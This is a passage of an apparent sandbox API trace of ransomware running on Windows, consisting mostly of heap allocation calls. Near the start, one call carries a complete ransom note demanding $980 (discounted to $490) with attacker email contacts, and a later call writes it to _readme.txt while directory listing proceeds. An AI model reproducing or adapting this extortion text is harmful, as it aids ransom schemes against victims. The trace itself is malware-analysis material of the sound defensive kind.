lpUsedDefaultChar=0x0) returned 1116 [0142.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.954] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.954] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.955] CloseHandle (hObject=0x6f0) returned 1 [0142.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.955] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cf0010, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cf0010, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8cf0010, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cf0010, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.956] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.956] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cf0010, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cf0010, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cf0010, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.956] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cf0010, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8cf0010, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8cf0010, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.956] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.956] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 